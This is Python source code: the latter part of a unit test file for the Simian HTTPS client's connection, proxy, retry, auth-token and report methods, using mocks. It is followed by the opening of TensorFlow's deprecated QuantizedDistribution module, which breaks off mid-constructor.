self.mbc._ca_cert_chain = 'cert chain foo' context_mock.return_value = context connection_mock.return_value = conn with mock.patch.object(self.mbc, '_LoadCACertChain') as load_ca_chain_mock: self.mbc.connect() self.assertEqual(self.mbc.sock, conn) load_ca_chain_mock.assert_called_once_with(context) context_mock.assert_called_once_with(client._SSL_VERSION) connection_mock.assert_called_once_with(context) conn.connect.assert_called_once_with((self.mbc.host, self.mbc.port)) if client._CIPHER_LIST: context.assert_has_calls([mock.call.set_cipher_list(client._CIPHER_LIST)]) def testConnectWhenNoCACertChain(self): """Test connect().""" context = mock.create_autospec(M2Crypto.SSL.Context) with mock.patch.object(client.SSL, 'Context', return_value=context): self.assertRaises(client.SimianClientError, self.mbc.connect) if client._CIPHER_LIST: context.assert_has_calls( [mock.call.set_cipher_list(client._CIPHER_LIST)]) class HttpsClientTest(basetest.TestCase): """Test HttpsClient class.""" def setUp(self): super(HttpsClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsClient(self.hostname) def tearDown(self): super(HttpsClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsClient, '_LoadHost') def testInit(self, mock_lh): """Test __init__().""" i = client.HttpsClient(self.hostname) self.assertEqual(i._progress_callback, None) self.assertEqual(i._ca_cert_chain, None) mock_lh.assert_called_once_with(self.hostname, None, None) def testLoadHost(self): """Test _LoadHost().""" self.client._LoadHost('host') self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('host', 12345) self.assertEqual(self.client.hostname, 'host') self.assertEqual(self.client.port, 12345) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321') self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('https://tsoh:54321', 9999) self.assertEqual(self.client.hostname, 'tsoh') self.assertEqual(self.client.port, 54321) self.assertTrue(self.client.use_https) self.client._LoadHost('foo.bar:5555') self.assertEqual(self.client.hostname, 'foo.bar') self.assertEqual(self.client.port, 5555) self.assertTrue(self.client.use_https) self.client._LoadHost('http://nonsecurehost') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('https://dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev1.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertTrue(self.client.use_https) self.client._LoadHost('http://dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual( self.client.hostname, 'dev2.latest.%s' % client.SERVER_HOSTNAME) self.assertEqual(self.client.port, None) self.assertFalse(self.client.use_https) self.client._LoadHost('http://nonsecurehost:1234') self.assertEqual(self.client.hostname, 'nonsecurehost') self.assertEqual(self.client.port, 1234) self.assertFalse(self.client.use_https) self.client._LoadHost(u'http://unicodehost') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.client._LoadHost(u'http://unicodehost', proxy=u'http://evilproxy:9') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilproxy') self.assertEqual(self.client.proxy_port, 9) self.assertFalse(self.client.proxy_use_https) self.client._LoadHost(u'http://unicodehost', proxy=u'https://evilprxssl:8') self.assertTrue(type(self.client.hostname) is str) self.assertEqual(self.client.hostname, 'unicodehost') self.assertTrue(type(self.client.proxy_hostname) is str) self.assertEqual(self.client.proxy_hostname, 'evilprxssl') self.assertEqual(self.client.proxy_port, 8) self.assertTrue(self.client.proxy_use_https) def testSetCACertChain(self): """Test SetCACertChain().""" self.client.SetCACertChain('foo') self.assertEqual(self.client._ca_cert_chain, 'foo') def _TestConnect(self, test_client, hostname, port): """Test _Connect().""" m = mock.Mock() m.return_value = m test_client._ca_cert_chain = 'cert chain' use_https = ( (not test_client.proxy_hostname and test_client.use_https) or (test_client.proxy_hostname and test_client.proxy_use_https)) if use_https: self.stubs.Set(client, 'HTTPSMultiBodyConnection', m) else: self.stubs.Set(client, 'HTTPMultiBodyConnection', m) expected = [mock.call(hostname, port)] if use_https: expected.append(mock.call.SetCACertChain('cert chain')) expected.append(mock.call.connect()) test_client._Connect() m.assert_has_calls(expected) def testConnect(self): self._TestConnect(self.client, self.hostname, self.port) def testConnectWithProxy(self): test_client = client.HttpsClient(self.hostname, proxy='proxyhost:123') self._TestConnect(test_client, 'proxyhost', 123) def testGetResponseNoFile(self): """Test _GetResponse() storing body directly into response obj.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'OK' conn = mock.create_autospec(httplib.HTTPConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, body) self.assertEqual(r.body_len, body_len) def testGetResponseOutputFile(self): """Test _GetResponse() sending the body to output_file.""" headers = {'foo': 1} status = 200 body = 'howdy sir' body_len = len(body) path = '/file' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(path) fake_open = fake_filesystem.FakeFileOpen(fs) output_file = fake_open(path, 'w') response = mock.create_autospec(httplib.HTTPResponse) response.getheaders.return_value = headers response.read.side_effect = [body, None] response.status = status response.reason = 'Ok' conn = mock.create_autospec(httplib.HTTPSConnection) conn.getresponse.return_value = response r = self.client._GetResponse(conn, output_file=output_file) self.assertEqual(r.headers, headers) self.assertEqual(r.status, status) self.assertEqual(r.body, None) self.assertEqual(r.body_len, body_len) output_file.close() self.assertEqual(body, fake_open(path).read()) def testRequest(self): """Test _Request().""" method = 'zGET' url = u'/url' body1 = {'encodeme': 1} body1_encoded = client.urllib.urlencode(body1) body2 = 'leave this alone' headers = {'User-Agent': 'gzip'} conn = mock.create_autospec(httplib.HTTPConnection) self.client._Request(method, conn, url, body1, headers) self.client._Request(method, conn, url, body2, headers) conn.request.assert_has_calls([ mock.call(method, str(url), body=body1_encoded, headers=headers), mock.call(method, str(url), body=body2, headers=headers)]) def _TestDoRequestResponse(self, test_client, url, req_url): """Test _DoRequestResponse().""" method = 'zomg' conn = mock.create_autospec(httplib.HTTPConnection) body = 'body' headers = 'headers' output_file = None response = mock.create_autospec(httplib.HTTPResponse) response.status = 200 proxy_use_https = test_client.proxy_use_https with mock.patch.object(test_client, '_Connect', return_value=conn): request_mock = mock.create_autospec(test_client._Request) self.stubs.Set(test_client, '_Request', request_mock) get_response_mock = mock.Mock(return_value=response) self.stubs.Set(test_client, '_GetResponse', get_response_mock) self.assertEqual( response, test_client._DoRequestResponse( method, url, body, headers, output_file)) request_mock.assert_called_once_with( method, conn, req_url, body=body, headers=headers) get_response_mock.assert_called_once_with(conn, output_file=output_file) conn.assert_not_called() response.assert_not_called() with mock.patch.object( test_client, '_Connect', side_effect=client.httplib.HTTPException): self.assertRaises( client.HTTPError, test_client._DoRequestResponse, method, url, body, headers, output_file) def testDoRequestResponse(self): self._TestDoRequestResponse(self.client, '/url', '/url') def testDoHttpRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='proxyhost:123') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='http://proxyhost:124') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" test_client = client.HttpsClient( 'http://%s' % self.hostname, proxy='https://proxyhost:125') req_url = 'http://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoHttpsRequestResponseWithHttpsProxy(self): """Test a https request via a http proxy.""" # default is https test_client = client.HttpsClient( self.hostname, proxy='https://proxyhost:126') req_url = 'https://' + self.hostname + '/url' self._TestDoRequestResponse(test_client, '/url', req_url) def testDoWithInvalidMethod(self): """Test Do() with invalid method.""" self.assertRaises( NotImplementedError, self.client.Do, 'badmethod', '/url') @mock.patch.object(client.time, 'sleep') def testDo(self, mock_sleep): """Test Do() with correct arguments and no output_filename.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None # HTTP 500 should retry. mock_response_fail = mock.create_autospec(httplib.HTTPResponse) mock_response_fail.status = 500 # HTTP 200 should succeed. mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=[ mock_response_fail, mock_response]) as mock_do_request_response: inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') do_request_response_call = mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file) self.client.Do(method, url, body, headers, output_filename) inorder_calls.assert_has_calls([ mock.call.sleep(0), do_request_response_call, mock.call.sleep(5), do_request_response_call]) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttp500(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.client.Do(method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) @mock.patch.object(client.time, 'sleep') def testDoWithRetryHttpError(self, mock_sleep): """Test Do() with a HTTP 500, thus a retry, but ending with HTTPError.""" method = 'GET' url = 'url' body = None headers = None output_file = None output_filename = None inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_sleep, 'sleep') mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 500 with mock.patch.object( self.client, '_DoRequestResponse', side_effect=client.HTTPError) as mock_do_request_response: inorder_calls.attach_mock(mock_do_request_response, '_DoRequestResponse') self.assertRaises( client.HTTPError, self.client.Do, method, url, body, headers, output_filename) expected = [] for i in xrange(0, client.DEFAULT_HTTP_ATTEMPTS): expected += [ mock.call.sleep(i * 5), mock.call._DoRequestResponse( method, url, body=body, headers={}, output_file=output_file)] inorder_calls.assert_has_calls(expected) def testDoWithOutputFilename(self): """Test Do() where an output_filename is supplied.""" method = 'GET' url = 'url' body = None headers = {} output_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=output_file) output_filename = '/tmpfile' mock_response = mock.create_autospec(httplib.HTTPResponse) mock_response.status = 200 with mock.patch.object( self.client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: self.client.Do( method, url, body, headers, output_filename, _open=mock_open) mock_do_request_response.assert_called_once_with( method, url, body=body, headers={}, output_file=output_file) def testDoWithProxy(self): """Test Do() with a proxy specified.""" method = 'GET' url = 'url' proxy = 'proxyhost:123' # Working case. mock_response = mock.create_autospec(httplib.HTTPConnection) mock_response.status = 200 test_client = client.HttpsClient(self.hostname, proxy=proxy) with mock.patch.object( test_client, '_DoRequestResponse', return_value=mock_response) as mock_do_request_response: test_client.Do(method, url) mock_do_request_response.assert_called_once_with( method, url, body=None, headers={}, output_file=None) # No port case. proxy = 'proxyhost' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) # Bad port case. proxy = 'proxyhost:alpha' self.assertRaises( client.Error, client.HttpsClient, self.hostname, proxy=proxy) class HttpsAuthClientTest(basetest.TestCase): """Test HttpsAuthClient.""" def setUp(self): super(HttpsAuthClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsAuthClient(self.hostname) self.fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(self.fs) self.fake_open = fake_filesystem.FakeFileOpen(self.fs) self.stubs.Set(client, 'os', fake_os) def tearDown(self): super(HttpsAuthClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsAuthClient, '_LoadRootCertChain') def testInit(self, _): """Test __init__().""" c = client.HttpsAuthClient(self.hostname) self.assertEqual(c._auth1, None) self.assertEqual(c._cookie_token, None) def testPlatformSetup(self): """Test PlatformSetup().""" with mock.patch.object(client.platform, 'system', return_value='Darwin'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_OSX_PATH) with mock.patch.object(client.platform, 'system', return_value='other'): self.client.facter_cache_path = 'x' self.client._PlatformSetup() self.assertEqual( self.client.facter_cache_path, self.client.FACTER_CACHE_DEFAULT_PATH) def testGetFacter(self): """Test GetFacter().""" st_dt = client.datetime.datetime.now() facter = {'foo': 'bar', 'one': '1'} file_path = '/x' lines = [ 'foo => bar', 'one => 1', 'I_am_invalid', ] fake_file = self.fs.CreateFile(file_path, contents='\n'.join(lines)) fake_file.st_uid = 0 fake_file.st_mtime = int(st_dt.strftime('%s')) self.client.facter_cache_path = file_path with mock.patch.object(client.os, 'geteuid', return_value=0): self.assertEqual(facter, self.client.GetFacter(open_fn=self.fake_open)) def testGetFacterWhenInsecureFileForRoot(self): """Test GetFacter().""" file_path = '/x' self.client.facter_cache_path = file_path fake_file = self.fs.CreateFile(file_path) fake_file.st_uid = 100 # root with mock.patch.object(client.os, 'geteuid', return_value=0): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() # same regular user with mock.patch.object(client.os, 'geteuid', return_value=200): fake_open = mock.Mock() self.assertEqual({}, self.client.GetFacter(open_fn=fake_open)) fake_open.assert_not_called() @mock.patch.object(client.os.path, 'isfile', return_value=False) def testGetFacterWhenCacheDoesNotExist(self, _): """Test GetFacter() with a nonexistent cache file.""" self.client.facter_cache_path = '/x' self.assertEqual({}, self.client.GetFacter()) def testGetFacterWhenCachePathIsNone(self): """Test GetFacter() with facter_cache_path is None.""" self.client.facter_cache_path = None self.assertEqual({}, self.client.GetFacter()) def testGetAuthTokenFromHeadersSuccess(self): token = '%s=123; secure; httponly;' % auth.AUTH_TOKEN_COOKIE result = self.client._GetAuthTokenFromHeaders( {'set-cookie': 'other=value;,%s,something=else;' % token}) self.assertEqual(token, result) def testGetAuthTokenFromHeadersMissingHeader(self): self.assertRaises( client.SimianClientError, self.client._GetAuthTokenFromHeaders, {'set-cookie': ''}) class SimianClientTest(basetest.TestCase): """Test SimianClient class.""" def setUp(self): self.hostname = 'hostname' self.port = None self.client = client.SimianClient(self.hostname) def testInitWithoutHostname(self): """Test __init__() without a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient() self.assertEqual(clienttmp.hostname, client.SERVER_HOSTNAME) self.assertEqual(clienttmp._user, user) def testInitWithHostname(self): """Test __init__() with a hostname passed.""" user = 'foouser' with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value=user): clienttmp = client.SimianClient('foo') self.assertEqual(clienttmp.hostname, 'foo') self.assertEqual(clienttmp._user, user) def testInitAsRoot(self): """Test __init__() with a hostname passed.""" with mock.patch.object( client.SimianClient, '_GetLoggedOnUser', return_value='root'): self.assertRaises(client.SimianClientError, client.SimianClient) def testIsDefaultHostClient(self): """Test IsDefaultHostClient().""" self.client._default_hostname = 'foo' self.assertEqual(self.client.IsDefaultHostClient(), 'foo') def testSimianRequest(self): """Test _SimianRequest().""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None good_response = client.Response(status=200, body='hello there') with mock.patch.object( self.client, 'Do', return_value=good_response) as do_mock: self.assertEqual( good_response.body, self.client._SimianRequest(method, url, headers=headers)) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def testSimianRequestWithError(self): """Test _SimianRequest() with an error status returned.""" method = 'zGET' url = '/url' headers = {'foo': 'bar'} output_filename = None error_response = client.Response(status=401, body='fooerror') with mock.patch.object( self.client, 'Do', return_value=error_response) as do_mock: self.assertRaises( client.SimianServerError, self.client._SimianRequest, method, url, headers=headers) do_mock.assert_called_once_with( method, url, body=None, headers=headers, output_filename=output_filename) def GenericStubTestAndReturn( self, method, method_return, method_args, stub_method_name, stub_method_return, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_return: any, value to expect from method method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_method_return: any, value to return from stubbed method call stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name """ with mock.patch.object( self.client, stub_method_name, return_value=stub_method_return) as m: got_rv = method(*method_args) self.assertEqual(got_rv, method_return) m.assert_called_once_with(*stub_args, **stub_kwargs) def GenericStubTest( self, method, method_args, stub_method_name, *stub_args, **stub_kwargs): """Helper test method. Args: method: method, to invoke in the test method_args: list, arguments to send to method during test stub_method_name: str, method name to stub out in SimianClient class stub_args: list, args to expect when calling stub_method_name stub_kwargs: dict, kwargs to expect when calling stub_method_name Returns: string, 'returnval' """ rv = 'returnval' return self.GenericStubTestAndReturn( method, rv, method_args, stub_method_name, rv, *stub_args, **stub_kwargs) def testGetCatalog(self): """Test GetCatalog().""" name = 'name' self.GenericStubTest( self.client.GetCatalog, [name], '_SimianRequest', 'GET', '/catalog/%s' % name) def testGetManifest(self): """Test GetManifest().""" name = 'name' self.GenericStubTest( self.client.GetManifest, [name], '_SimianRequest', 'GET', '/manifest/%s' % name) def testGetPackage(self): """Test GetPackage().""" name = 'name' self.GenericStubTest( self.client.GetPackage, [name], '_SimianRequest', 'GET', '/pkgs/%s' % name, output_filename=None) def testGetPackageInfo(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'hello' self.GenericStubTestAndReturn( self.client.GetPackageInfo, 'hello', [filename], '_SimianRequest', response, 'GET', '/pkgsinfo/%s' % filename, full_response=True) def testGetPackageInfoWhenHash(self): """Test GetPackageInfo().""" filename = 'name.dmg' response = mock.create_autospec(httplib.HTTPResponse) response.body = 'body' response.headers = {'x-pkgsinfo-hash': 'hash'} self.GenericStubTestAndReturn( self.client.GetPackageInfo, ('hash', 'body'), [filename, True], '_SimianRequest', response, 'GET', '/pkgsinfo/%s?hash=1' % filename, full_response=True) def testDownloadPackage(self): """Test DownloadPackage().""" filename = 'foo' self.GenericStubTest( self.client.DownloadPackage, [filename], '_SimianRequest', 'GET', '/pkgs/%s' % filename, output_filename=filename) def testPostReport(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params], '_SimianRequest', 'POST', url, body) def testPostReportWhenFeedback(self): """Test PostReport().""" report_type = 'foo' params = {'bar': 1} url = '/reports' body = '_report_type=%s&%s&_feedback=1' % ( report_type, client.urllib.urlencode(params, doseq=True)) self.GenericStubTest( self.client.PostReport, [report_type, params, True], '_SimianRequest', 'POST', url, body) def testPostReportBody(self): """Test PostReportBody().""" url = '/reports' body = 'foo' self.GenericStubTest( self.client.PostReportBody, [body], '_SimianRequest', 'POST', url, body) def testPostReportBodyWhenFeedback(self): """Test PostReportBody().""" url = '/reports' body = 'foo' body_with_feedback = 'foo&_feedback=1' self.GenericStubTest( self.client.PostReportBody, [body, True], '_SimianRequest', 'POST', url, body_with_feedback) @mock.patch.object(client.os.path, 'isfile', return_value=True) def testUploadFile(self, _): """Test UploadFile().""" file_type = 'log' file_name = 'file.log' file_path = 'path/to/' + file_name url = '/uploadfile/%s/%s' % (file_type, file_name) mock_file = mock.create_autospec(file) mock_open = mock.Mock(return_value=mock_file) with mock.patch.object(self.client, 'Do') as mock_do: self.client.UploadFile(file_path, file_type, _open=mock_open) mock_do.assert_called_once_with('PUT', url, mock_file) @mock.patch.object(client.logging, 'error', autospec=True) @mock.patch.object(client.os.path, 'isfile', return_value=False) def testUploadFileWhenLogNotFound(self, mock_isfile, mock_logging_error): """Test UploadFile() when the file is not found.""" file_path = 'path/to/file.log' self.client.UploadFile(file_path, 'foo-file-type') mock_logging_error.assert_called_once_with( 'UploadFile file not found: %s', file_path) mock_isfile.assert_called_once_with(file_path) class SimianAuthClientTest(basetest.TestCase): """Test SimianAuthClient class.""" def setUp(self): super(SimianAuthClientTest, self).setUp() self.pac = client.SimianAuthClient() def testGetAuthToken(self): """Test GetAuthToken().""" with mock.patch.object(self.pac, 'DoSimianAuth'): self.pac._cookie_token = 'token' self.assertEqual(self.pac.GetAuthToken(), 'token') def testLogoutAuthToken(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object(self.pac, '_SimianRequest', return_value='ok'): self.assertTrue(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) def testLogoutAuthTokenWhenFail(self): """Test LogoutAuthToken().""" url = '/auth?logout=True' with mock.patch.object( self.pac, '_SimianRequest', side_effect=client.SimianServerError): self.assertFalse(self.pac.LogoutAuthToken()) self.pac._SimianRequest.assert_called_once_with('GET', url) logging.basicConfig(filename='/dev/null') def main(unused_argv): basetest.main() if __name__ == '__main__': app.run()
apache-2.0
alsrgv/tensorflow
tensorflow/contrib/distributions/python/ops/quantized_distribution.py
22
20681
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Quantized distribution.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops.distributions import distribution as distributions from tensorflow.python.ops.distributions import util as distribution_util from tensorflow.python.util import deprecation __all__ = ["QuantizedDistribution"] @deprecation.deprecated( "2018-10-01", "The TensorFlow Distributions library has moved to " "TensorFlow Probability " "(https://github.com/tensorflow/probability). You " "should update all references to use `tfp.distributions` " "instead of `tf.contrib.distributions`.", warn_once=True) def _logsum_expbig_minus_expsmall(big, small): """Stable evaluation of `Log[exp{big} - exp{small}]`. To work correctly, we should have the pointwise relation: `small <= big`. Args: big: Floating-point `Tensor` small: Floating-point `Tensor` with same `dtype` as `big` and broadcastable shape. Returns: `Tensor` of same `dtype` of `big` and broadcast shape. """ with ops.name_scope("logsum_expbig_minus_expsmall", values=[small, big]): return math_ops.log(1. - math_ops.exp(small - big)) + big _prob_base_note = """ For whole numbers `y`, ``` P[Y = y] := P[X <= low], if y == low, := P[X > high - 1], y == high, := 0, if j < low or y > high, := P[y - 1 < X <= y], all other y. ``` """ _prob_note = _prob_base_note + """ The base distribution's `cdf` method must be defined on `y - 1`. If the base distribution has a `survival_function` method, results will be more accurate for large values of `y`, and in this case the `survival_function` must also be defined on `y - 1`. """ _log_prob_note = _prob_base_note + """ The base distribution's `log_cdf` method must be defined on `y - 1`. If the base distribution has a `log_survival_function` method results will be more accurate for large values of `y`, and in this case the `log_survival_function` must also be defined on `y - 1`. """ _cdf_base_note = """ For whole numbers `y`, ``` cdf(y) := P[Y <= y] = 1, if y >= high, = 0, if y < low, = P[X <= y], otherwise. ``` Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`. This dictates that fractional `y` are first floored to a whole number, and then above definition applies. """ _cdf_note = _cdf_base_note + """ The base distribution's `cdf` method must be defined on `y - 1`. """ _log_cdf_note = _cdf_base_note + """ The base distribution's `log_cdf` method must be defined on `y - 1`. """ _sf_base_note = """ For whole numbers `y`, ``` survival_function(y) := P[Y > y] = 0, if y >= high, = 1, if y < low, = P[X <= y], otherwise. ``` Since `Y` only has mass at whole numbers, `P[Y <= y] = P[Y <= floor(y)]`. This dictates that fractional `y` are first floored to a whole number, and then above definition applies. """ _sf_note = _sf_base_note + """ The base distribution's `cdf` method must be defined on `y - 1`. """ _log_sf_note = _sf_base_note + """ The base distribution's `log_cdf` method must be defined on `y - 1`. """ class QuantizedDistribution(distributions.Distribution): """Distribution representing the quantization `Y = ceiling(X)`. #### Definition in Terms of Sampling ``` 1. Draw X 2. Set Y <-- ceiling(X) 3. If Y < low, reset Y <-- low 4. If Y > high, reset Y <-- high 5. Return Y ``` #### Definition in Terms of the Probability Mass Function Given scalar random variable `X`, we define a discrete random variable `Y` supported on the integers as follows: ``` P[Y = j] := P[X <= low], if j == low, := P[X > high - 1], j == high, := 0, if j < low or j > high, := P[j - 1 < X <= j], all other j. ``` Conceptually, without cutoffs, the quantization process partitions the real line `R` into half open intervals, and identifies an integer `j` with the right endpoints: ``` R = ... (-2, -1](-1, 0](0, 1](1, 2](2, 3](3, 4] ... j = ... -1 0 1 2 3 4 ... ``` `P[Y = j]` is the mass of `X` within the `jth` interval. If `low = 0`, and `high = 2`, then the intervals are redrawn and `j` is re-assigned: ``` R = (-infty, 0](0, 1](1, infty) j = 0 1 2 ``` `P[Y = j]` is still the mass of `X` within the `jth` interval. #### Examples We illustrate a mixture of discretized logistic distributions [(Salimans et al., 2017)][1]. This is used, for example, for capturing 16-bit audio in WaveNet [(van den Oord et al., 2017)][2]. The values range in a 1-D integer domain of `[0, 2**16-1]`, and the discretization captures `P(x - 0.5 < X <= x + 0.5)` for all `x` in the domain excluding the endpoints. The lowest value has probability `P(X <= 0.5)` and the highest value has probability `P(2**16 - 1.5 < X)`. Below we assume a `wavenet` function. It takes as `input` right-shifted audio samples of shape `[..., sequence_length]`. It returns a real-valued tensor of shape `[..., num_mixtures * 3]`, i.e., each mixture component has a `loc` and `scale` parameter belonging to the logistic distribution, and a `logits` parameter determining the unnormalized probability of that component. ```python import tensorflow_probability as tfp tfd = tfp.distributions tfb = tfp.bijectors net = wavenet(inputs) loc, unconstrained_scale, logits = tf.split(net, num_or_size_splits=3, axis=-1) scale = tf.nn.softplus(unconstrained_scale) # Form mixture of discretized logistic distributions. Note we shift the # logistic distribution by -0.5. This lets the quantization capture "rounding" # intervals, `(x-0.5, x+0.5]`, and not "ceiling" intervals, `(x-1, x]`. discretized_logistic_dist = tfd.QuantizedDistribution( distribution=tfd.TransformedDistribution( distribution=tfd.Logistic(loc=loc, scale=scale), bijector=tfb.AffineScalar(shift=-0.5)), low=0., high=2**16 - 1.) mixture_dist = tfd.MixtureSameFamily( mixture_distribution=tfd.Categorical(logits=logits), components_distribution=discretized_logistic_dist) neg_log_likelihood = -tf.reduce_sum(mixture_dist.log_prob(targets)) train_op = tf.train.AdamOptimizer().minimize(neg_log_likelihood) ``` After instantiating `mixture_dist`, we illustrate maximum likelihood by calculating its log-probability of audio samples as `target` and optimizing. #### References [1]: Tim Salimans, Andrej Karpathy, Xi Chen, and Diederik P. Kingma. PixelCNN++: Improving the PixelCNN with discretized logistic mixture likelihood and other modifications. _International Conference on Learning Representations_, 2017. https://arxiv.org/abs/1701.05517 [2]: Aaron van den Oord et al. Parallel WaveNet: Fast High-Fidelity Speech Synthesis. _arXiv preprint arXiv:1711.10433_, 2017. https://arxiv.org/abs/1711.10433 """ @deprecation.deprecated( "2018-10-01", "The TensorFlow Distributions library has moved to " "TensorFlow Probability " "(https://github.com/tensorflow/probability). You " "should update all references to use `tfp.distributions` " "instead of `tf.contrib.distributions`.", warn_once=True) def __init__(self, distribution, low=None, high=None, validate_args=False, name="QuantizedDistribution"): """Construct a Quantized Distribution representing `Y = ceiling(X)`. Some properties are inherited from the distribution defining `X`. Example: `allow_nan_stats` is determined for this `QuantizedDistribution` by reading the `distribution`. Args: distribution: The base distribution class to transform. Typically an instance of `Distribution`. low: `Tensor` with same `dtype` as this distribution and shape able to be added to samples. Should be a whole number. Default `None`. If provided, base distribution's `prob` should be defined at `low`. high: `Tensor` with same `dtype` as this distribution and shape able to be added to samples. Should be a whole number. Default `None`. If provided, base distribution's `prob` should be defined at `high - 1`. `high` must be strictly greater than `low`. validate_args: Python `bool`, default `False`. When `True` distribution parameters are checked for validity despite possibly degrading runtime performance. When `False` invalid inputs may silently render incorrect outputs. name: Python `str` name prefixed to Ops created by this class. Raises: TypeError: If `dist_cls` is not a subclass of `Distribution` or continuous. NotImplementedError: If the base distribution does not implement `cdf`. """ parameters = dict(locals()) values = ( list(distribution.parameters.values()) + [low, high]) with ops.name_scope(name, values=values) as name: self._dist = distribution if low is not None: low = ops.convert_to_tensor(low, name="low") if high is not None: high = ops.convert_to_tensor(high, name="high") check_ops.assert_same_float_dtype( tensors=[self.distribution, low, high]) # We let QuantizedDistribution access _graph_parents since this class is # more like a baseclass. graph_parents = self._dist._graph_parents # pylint: disable=protected-access checks = [] if validate_args and low is not None and high is not None: message = "low must be strictly less than high." checks.append( check_ops.assert_less( low, high, message=message)) self._validate_args = validate_args # self._check_integer uses this. with ops.control_dependencies(checks if validate_args else []): if low is not None: self._low = self._check_integer(low) graph_parents += [self._low] else: self._low = None if high is not None: self._high = self._check_integer(high) graph_parents += [self._high] else: self._high = None super(QuantizedDistribution, self).__init__( dtype=self._dist.dtype, reparameterization_type=distributions.NOT_REPARAMETERIZED, 